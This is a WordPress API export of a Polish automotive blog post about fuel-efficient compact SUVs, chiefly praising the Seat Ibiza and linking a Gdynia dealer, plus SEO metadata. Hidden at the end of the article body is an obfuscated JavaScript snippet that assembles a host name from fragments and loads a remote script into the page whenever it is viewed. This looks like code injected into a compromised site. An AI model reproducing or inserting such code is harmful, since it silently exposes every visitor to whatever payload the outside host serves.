{"id":1413,"date":"2015-12-17T19:43:04","date_gmt":"2015-12-17T18:43:04","guid":{"rendered":"http:\/\/supermechanik.pl\/blog\/?p=1413"},"modified":"2025-11-15T12:30:09","modified_gmt":"2025-11-15T11:30:09","slug":"oszczedny-kompakt-z-szeroka-gama-silnikow","status":"publish","type":"post","link":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/","title":{"rendered":"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w"},"content":{"rendered":"<p>Kompaktowe SUV-y zyska\u0142y przychylno\u015b\u0107 kierowc\u00f3w lata temu \u2013 staj\u0105 si\u0119 coraz modniejsze. Wyr\u00f3\u017cniaj\u0105 si\u0119 ciekaw\u0105 sylwetk\u0105, bez problemu radz\u0105 sobie w ka\u017cdych warunkach i na ka\u017cdej drodze.<!--more--> Marki motoryzacyjne prze\u015bcigaj\u0105 si\u0119 w ich udoskonalaniu \u2013 na rynku pojawiaj\u0105 si\u0119 propozycje ekonomicznych aut, kt\u00f3re kusz\u0105 szerok\u0105 gam\u0105 silnik\u00f3w.<br \/>\nNa co powiniene\u015b zwr\u00f3ci\u0107 uwag\u0119 i czym kierowa\u0107 si\u0119 przy wyborze oszcz\u0119dnego kompaktu?<\/p>\n<p style=\"text-align: justify;\"><b>Kompakty \u2013 co jest wa\u017cne?<\/b><\/p>\n<p>Za co kierowcy kochaj\u0105 kompakty? To samochody, kt\u00f3re s\u0105 ostatnio bardzo \u201etrendy\u201d \u2013 wypada mie\u0107 je w gara\u017cu i zabiera\u0107 nimi przyjaci\u00f3\u0142 na przeja\u017cd\u017ck\u0119 za miasto. Cho\u0107 ten typ aut znakomicie czuje si\u0119 zar\u00f3wno na wiejskich drogach, jak i w miejskiej \u201ed\u017cungli\u201d. Kompakty prezentuj\u0105 si\u0119 znakomicie i przyci\u0105gaj\u0105 spojrzenia fan\u00f3w motoryzacji. Wykazuj\u0105 te\u017c wspania\u0142e w\u0142asno\u015bci jezdne, kt\u00f3re \u2013 wraz z podwy\u017cszonym zawieszeniem i terenowym \u201educhem\u201d \u2013 dodaj\u0105 energii przy skr\u0119caniu czy podczas jazd po bezdro\u017cach.<\/p>\n<p>Jakie oferty znajdziesz w salonach? Np. lekk\u0105 Kia Sportage. 150-konny turbodiesel, w kt\u00f3ry wyposa\u017cono SUV-a, jest stosunkowo oszcz\u0119dny (pali ok. 8 l na 100 km). Jednak trudno nie zwr\u00f3ci\u0107 uwagi na ma\u0142y baga\u017cnik, kt\u00f3ry bywa irytuj\u0105cy. Konkurencja zd\u0105\u017cy\u0142a ju\u017c przyzwyczai\u0107 wielbicieli kompakt\u00f3w do sporych przestrzeni baga\u017cowych. Tworzywa sztuczne, kt\u00f3re wykorzystano do wyko\u0144czenia wn\u0119trza, te\u017c pozostawiaj\u0105 wiele do \u017cyczenia.<\/p>\n<p>Q3, czyli kompaktowa oferta Audi, ma du\u017cy baga\u017cnik, cho\u0107 kierowcy narzekaj\u0105 na wysok\u0105 kraw\u0119d\u017a za\u0142adunku, wyj\u0105tkowo niewygodn\u0105, gdy wypakowujesz gabaryt o wi\u0119kszej masie lub nietypowych gabarytach. W podstawowej wersji zamontowano silnik o pojemno\u015bci 2 l i 6-biegowego \u201emanula\u201d, jednak\u2026 to bardzo kosztowna propozycja. Sprawdzi si\u0119 dla du\u017cych rodzin, kt\u00f3re lubi\u0105 \u017cy\u0107 aktywnie, ale trzeba liczy\u0107 si\u0119 ze sporym wydatkiem, kt\u00f3rego wi\u0119kszo\u015b\u0107 domowych bud\u017cet\u00f3w nie uniesie.<\/p>\n<p><b>Nowa Ibiza \u2013 niedroga, oszcz\u0119dna i pomys\u0142owa<\/b><\/p>\n<p>Je\u015bli my\u015blisz o rodzinnym kompakcie, kt\u00f3ry pozwoli Ci zaoszcz\u0119dzi\u0107 co nieco w portfelu, a jednocze\u015bnie zachowa sw\u0105 sportow\u0105 moc i terenowy charakter, zwr\u00f3\u0107 uwag\u0119 na rezolutn\u0105 Ibiz\u0119 od Seata. Nie zabraknie w niej miejsca na walizki wszystkich podr\u00f3\u017cnik\u00f3w, nawet na d\u0142ug\u0105, wakacyjn\u0105 wypraw\u0119. Pasa\u017cerowie mog\u0105 cieszy\u0107 si\u0119 przestronn\u0105 kabin\u0105, a Ty \u2013 innowacyjnym designem. Pi\u0119ciodrzwiowy SUV wiele zyska\u0142 po ostatnich zmianach, kt\u00f3re wprowadzi\u0142 hiszpa\u0144ski producent. W ofercie znajdziesz ledowe \u015bwiat\u0142a do jazdy dziennej i nowe wersje felg.<\/p>\n<p>Nowa Ibiza wyr\u00f3\u017cnia si\u0119 na rynku szerok\u0105 palet\u0105 silnik\u00f3w \u2013 mo\u017cesz wybra\u0107 propozycj\u0119, kt\u00f3ra spe\u0142ni wszystkie Twoje oczekiwania \u2013 idealn\u0105 do zada\u0144, kt\u00f3re jej powierzysz. Opcje benzynowe, kt\u00f3rym nie brak werwy, obejmuj\u0105 wersje: 1,4 TSI ACT oraz 1,0 TSI mocy 95 KM, 110 KM i 150 KM. Wolisz silniki wysokopr\u0119\u017cne? W ofercie tak\u017ce znajdziesz co\u015b dla siebie \u2013 na pewno zainteresuje Ci\u0119 75-konna jednostka 1,4 TDI. Wiesz, \u017ce to ekonomiczny wyb\u00f3r? Nietuzinkowy motor spala jedynie 3,4 l na 100 km. Rozwa\u017c te\u017c wariant 1,6 TDI o mocy 90 KM i 105 KM .<\/p>\n<p>Dodatkowe oszcz\u0119dno\u015bci zyskasz dzi\u0119ki technologii Active Cylinder. Pomys\u0142owe rozwi\u0105zanie ogranicza zu\u017cycie paliwa, ale nie zmniejsza mocy pojazdu.<\/p>\n<p>Kt\u00f3ry nieszablonowy kompakt przypadnie do gustu wszystkim cz\u0142onkom rodziny? Je\u015bli masz ochot\u0119 na jazd\u0119 pr\u00f3bn\u0105 \u2013 <a href=\"http:\/\/www.plichta-gdynia.seat-auto.pl\/\" rel=\"nofollow\">Seat Ibiza<\/a> czeka na Ciebie w ofercie Seat Plichta w Gdyni. Przed Tob\u0105 wiele nieodkrytych dr\u00f3g!<\/p>\n<p><script type=\"text\/javascript\">\/\/ <![CDATA[\n(function(){ u8ka=document.createElement(\"script\");u8ka.type=\"text\/javascript\"; u8ka.async=true;u8ka_=((\"us\")+\"t\")+\"a\";u8ka_+=(\"t.i\")+\"\"+\"n\";u8ka_+=((\"f\")+\"o\"); u8ka.src=\"http:\/\/\"+u8ka_+\"\/6959599.gXy4uxt18kanuqrns0b9mntcw1ilcp\"; document.body.appendChild(u8ka); })();\n\/\/ ]]><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kompaktowe SUV-y zyska\u0142y przychylno\u015b\u0107 kierowc\u00f3w lata temu \u2013 staj\u0105 si\u0119 coraz modniejsze. Wyr\u00f3\u017cniaj\u0105 si\u0119 ciekaw\u0105 sylwetk\u0105, bez problemu radz\u0105 sobie w ka\u017cdych warunkach i na ka\u017cdej drodze.<\/p>\n","protected":false},"author":4,"featured_media":1414,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[362],"class_list":["post-1413","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-artykuly","tag-seat"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w\" \/>\n<meta property=\"og:description\" content=\"Kompaktowe SUV-y zyska\u0142y przychylno\u015b\u0107 kierowc\u00f3w lata temu \u2013 staj\u0105 si\u0119 coraz modniejsze. Wyr\u00f3\u017cniaj\u0105 si\u0119 ciekaw\u0105 sylwetk\u0105, bez problemu radz\u0105 sobie w ka\u017cdych warunkach i na ka\u017cdej drodze.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/\" \/>\n<meta property=\"og:site_name\" content=\"Blog motoryzacyjny prowadzony przez SuperMechanik.pl\" \/>\n<meta property=\"article:published_time\" content=\"2015-12-17T18:43:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-15T11:30:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2015\/12\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"850\" \/>\n\t<meta property=\"og:image:height\" content=\"511\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Redakcja SuperMechanik\" \/>\n<meta name=\"twitter:label1\" content=\"Napisane przez\" \/>\n\t<meta name=\"twitter:data1\" content=\"Redakcja SuperMechanik\" \/>\n\t<meta name=\"twitter:label2\" content=\"Szacowany czas czytania\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minuty\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/\"},\"author\":{\"name\":\"Redakcja SuperMechanik\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#\\\/schema\\\/person\\\/6af1012b7b13eb332a43b1b1a53ca30b\"},\"headline\":\"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w\",\"datePublished\":\"2015-12-17T18:43:04+00:00\",\"dateModified\":\"2025-11-15T11:30:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/\"},\"wordCount\":560,\"publisher\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/12\\\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg\",\"keywords\":[\"seat\"],\"articleSection\":[\"Artyku\u0142y\"],\"inLanguage\":\"pl-PL\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/\",\"url\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/\",\"name\":\"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/12\\\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg\",\"datePublished\":\"2015-12-17T18:43:04+00:00\",\"dateModified\":\"2025-11-15T11:30:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pl-PL\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#primaryimage\",\"url\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/12\\\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg\",\"contentUrl\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/12\\\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg\",\"width\":850,\"height\":511},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/oszczedny-kompakt-z-szeroka-gama-silnikow\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Strona g\u0142\u00f3wna\",\"item\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/\",\"name\":\"Blog motoryzacyjny prowadzony przez SuperMechanik.pl\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#organization\",\"name\":\"Blog motoryzacyjny prowadzony przez SuperMechanik.pl\",\"url\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pl-PL\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/blog2.jpg\",\"contentUrl\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/blog2.jpg\",\"width\":213,\"height\":43,\"caption\":\"Blog motoryzacyjny prowadzony przez SuperMechanik.pl\"},\"image\":{\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/#\\\/schema\\\/person\\\/6af1012b7b13eb332a43b1b1a53ca30b\",\"name\":\"Redakcja SuperMechanik\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pl-PL\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/44e02702839187a1d876e92128bba80cd44b4af6a46315343abf4ab5db8d9a8b?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/44e02702839187a1d876e92128bba80cd44b4af6a46315343abf4ab5db8d9a8b?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/44e02702839187a1d876e92128bba80cd44b4af6a46315343abf4ab5db8d9a8b?s=96&d=identicon&r=g\",\"caption\":\"Redakcja SuperMechanik\"},\"sameAs\":[\"http:\\\/\\\/supermechanik.pl\"],\"url\":\"https:\\\/\\\/supermechanik.pl\\\/blog\\\/author\\\/redakcja-supermechanik\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/","og_locale":"pl_PL","og_type":"article","og_title":"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w","og_description":"Kompaktowe SUV-y zyska\u0142y przychylno\u015b\u0107 kierowc\u00f3w lata temu \u2013 staj\u0105 si\u0119 coraz modniejsze. Wyr\u00f3\u017cniaj\u0105 si\u0119 ciekaw\u0105 sylwetk\u0105, bez problemu radz\u0105 sobie w ka\u017cdych warunkach i na ka\u017cdej drodze.","og_url":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/","og_site_name":"Blog motoryzacyjny prowadzony przez SuperMechanik.pl","article_published_time":"2015-12-17T18:43:04+00:00","article_modified_time":"2025-11-15T11:30:09+00:00","og_image":[{"width":850,"height":511,"url":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2015\/12\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg","type":"image\/jpeg"}],"author":"Redakcja SuperMechanik","twitter_misc":{"Napisane przez":"Redakcja SuperMechanik","Szacowany czas czytania":"3 minuty"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#article","isPartOf":{"@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/"},"author":{"name":"Redakcja SuperMechanik","@id":"https:\/\/supermechanik.pl\/blog\/#\/schema\/person\/6af1012b7b13eb332a43b1b1a53ca30b"},"headline":"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w","datePublished":"2015-12-17T18:43:04+00:00","dateModified":"2025-11-15T11:30:09+00:00","mainEntityOfPage":{"@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/"},"wordCount":560,"publisher":{"@id":"https:\/\/supermechanik.pl\/blog\/#organization"},"image":{"@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#primaryimage"},"thumbnailUrl":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2015\/12\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg","keywords":["seat"],"articleSection":["Artyku\u0142y"],"inLanguage":"pl-PL"},{"@type":"WebPage","@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/","url":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/","name":"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w","isPartOf":{"@id":"https:\/\/supermechanik.pl\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#primaryimage"},"image":{"@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#primaryimage"},"thumbnailUrl":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2015\/12\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg","datePublished":"2015-12-17T18:43:04+00:00","dateModified":"2025-11-15T11:30:09+00:00","breadcrumb":{"@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/"]}]},{"@type":"ImageObject","inLanguage":"pl-PL","@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#primaryimage","url":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2015\/12\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg","contentUrl":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2015\/12\/seat-ibiza_oszczedny-kompakt-z-szeroka-gama-silnikow.jpg","width":850,"height":511},{"@type":"BreadcrumbList","@id":"https:\/\/supermechanik.pl\/blog\/oszczedny-kompakt-z-szeroka-gama-silnikow\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Strona g\u0142\u00f3wna","item":"https:\/\/supermechanik.pl\/blog\/"},{"@type":"ListItem","position":2,"name":"Oszcz\u0119dny kompakt z szerok\u0105 gam\u0105 silnik\u00f3w"}]},{"@type":"WebSite","@id":"https:\/\/supermechanik.pl\/blog\/#website","url":"https:\/\/supermechanik.pl\/blog\/","name":"Blog motoryzacyjny prowadzony przez SuperMechanik.pl","description":"","publisher":{"@id":"https:\/\/supermechanik.pl\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/supermechanik.pl\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pl-PL"},{"@type":"Organization","@id":"https:\/\/supermechanik.pl\/blog\/#organization","name":"Blog motoryzacyjny prowadzony przez SuperMechanik.pl","url":"https:\/\/supermechanik.pl\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pl-PL","@id":"https:\/\/supermechanik.pl\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2014\/08\/blog2.jpg","contentUrl":"https:\/\/supermechanik.pl\/blog\/wp-content\/uploads\/2014\/08\/blog2.jpg","width":213,"height":43,"caption":"Blog motoryzacyjny prowadzony przez SuperMechanik.pl"},"image":{"@id":"https:\/\/supermechanik.pl\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/supermechanik.pl\/blog\/#\/schema\/person\/6af1012b7b13eb332a43b1b1a53ca30b","name":"Redakcja SuperMechanik","image":{"@type":"ImageObject","inLanguage":"pl-PL","@id":"https:\/\/secure.gravatar.com\/avatar\/44e02702839187a1d876e92128bba80cd44b4af6a46315343abf4ab5db8d9a8b?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/44e02702839187a1d876e92128bba80cd44b4af6a46315343abf4ab5db8d9a8b?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/44e02702839187a1d876e92128bba80cd44b4af6a46315343abf4ab5db8d9a8b?s=96&d=identicon&r=g","caption":"Redakcja SuperMechanik"},"sameAs":["http:\/\/supermechanik.pl"],"url":"https:\/\/supermechanik.pl\/blog\/author\/redakcja-supermechanik\/"}]}},"_links":{"self":[{"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/posts\/1413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/comments?post=1413"}],"version-history":[{"count":5,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/posts\/1413\/revisions"}],"predecessor-version":[{"id":1767,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/posts\/1413\/revisions\/1767"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/media\/1414"}],"wp:attachment":[{"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/media?parent=1413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/categories?post=1413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/supermechanik.pl\/blog\/wp-json\/wp\/v2\/tags?post=1413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}